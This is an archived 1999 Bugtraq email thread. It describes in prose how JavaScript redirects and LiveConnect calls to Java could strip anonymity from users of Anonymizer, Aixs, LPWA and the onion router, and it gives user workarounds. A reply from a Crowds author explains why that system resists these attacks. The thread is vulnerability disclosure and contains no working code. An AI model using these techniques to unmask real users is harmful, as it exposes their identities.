Everhart, Glenn (FUSA)
From:	Avi Rubin [rubin@RESEARCH.ATT.COM]
Sent:	Tuesday, April 13, 1999 9:06 PM
To:	BUGTRAQ@NETSPACE.ORG
Subject:	Bugs in anonymity services
Just a quick response. I am one of the authors of the Crowds system.
Your attacks do not mention Crowds, although that system was described
in the Lewis article.

In our original paper, which was published over a year ago, we mentioned
the possibility of Java or Javascript attacks to compromise anonymity.
Our system also avoids redirect attacks by filtering out meta refresh
tags. I don't think that Crowds is vulnerable to any of the attacks you
mention, as users are required (requested) to turn off all active
content, such as Java, javascript, etc. and to proxy all services
through the crowd (although not all are supported - they won't work, but
they won't compromise anonymity).

Unfortunately, we cannot ship our code outside of the US, but it is
available for free non-commercial use in the US. The page is

   http://www.research.att.com/projects/crowds

Avi

>
> Hello,
>
> I found very serious security holes in all of the major
> anonymous Web surfing services (Anonymizer, Aixs, LPWA, etc.).
> These security holes allow a Web site to obtain information about
> users that the anonymizing services are suppose to be hiding.  This
> message provides complete details of the problem and offers
> a simple work-around for users until the security holes are
> fixed.
>
> The April 8th issue of the New York Times has an article
> by Peter H. Lewis in the Circuits section that describes
> various types of services that allow people to anonymously
> surf the Web.  The article is entitled "Internet Hide and
> Seek" and is available at the NY Times Web site:
>
>     http://www.nytimes.com/library/tech/99/04/circuits/articles/08pete.html
>
> (Note, this article can only viewed if you have a free
> NY Times Web account.)
>
> The three services described in the article are:
>
>     Anonymizer (http://www.anonymizer.com)
>     Bell Labs (http://www.bell-labs.com/project/lpwa)
>     Naval Research Laboratory (http://www.onion-router.net)
>
> In addition, I found a pointer to fourth service in a security
> newsgroup:
>
>     Aixs (http://aixs.net/aixs/)
>
> The best known of these services is the Anonymizer at
> www.anonymizer.com.  However all four services basically
> work in the same manner.  They are intended to hide
> information from a Web site when visited by a user.  The
> services prevent the Web site from seeing the IP address,
> host computer name, and cookies of a user.  All the services act
> as proxies fetching pages from Web sites instead of users
> going directly to Web sites.  The services make the promise
> that they don't pass private information along to
> Web sites.  They also do no logging of Web sites that
> have been visited.
>
> After reading the article, I was curious to find out how well
> each of these services worked.  In particular, I wanted to
> know if it would be possible for a Web site to
> defeat any of these systems.  Unfortunately, with less
> than an hour's worth of work, I was able to get all four
> systems to fail when using Netscape 4.5.
>
> The most alarming failures occurred with the Anonymizer and Aixs
> systems.  With the same small HTML page I was able
> to quietly turn off the anonymzing feature in both services.
> Once this page runs, it quickly redirects to a regular
> Web page of the Web site.  Because the browser is no
> longer in anonymous mode, IP addresses and cookies
> are again sent from the user's browser to all Web servers.
> This security hole exists because both services fail to properly
> strip out embedded JavaScript code in all cases from HTML
> pages.
>
> With the Bell Labs and NRL systems I found a different
> failure.  With a simple JavaScript expression I was
> able to query the IP address and host name of the
> browser computer.  The query was done by calling the
> Java InetAddress class using the LiveConnect feature
> of Netscape Navigator.  Once JavaScript has this
> information, it can easily be transmitted it back to a
> Web server as part of a URL.
>
> A demo on the use of Java InetAddress class to fetch
> the browser IP address and host name can be found at:
>
>    http://www.tiac.net/users/smiths/js/livecon/index.htm
>
> If you are a user of any these services, I highly recommend
> that you turn off JavaScript, Java, and ActiveX
> controls in your browser before surfing the Web.
> This simple precaution will prevent any leaks of
> your IP address or cookies.  I will be notifying all 4 vendors
> about these security holes and hopefully this same recommendation
> will be given to all users.
>
> If you have any questions or comments, please send them via Email.
>
> Richard M. Smith
> smiths@tiac.net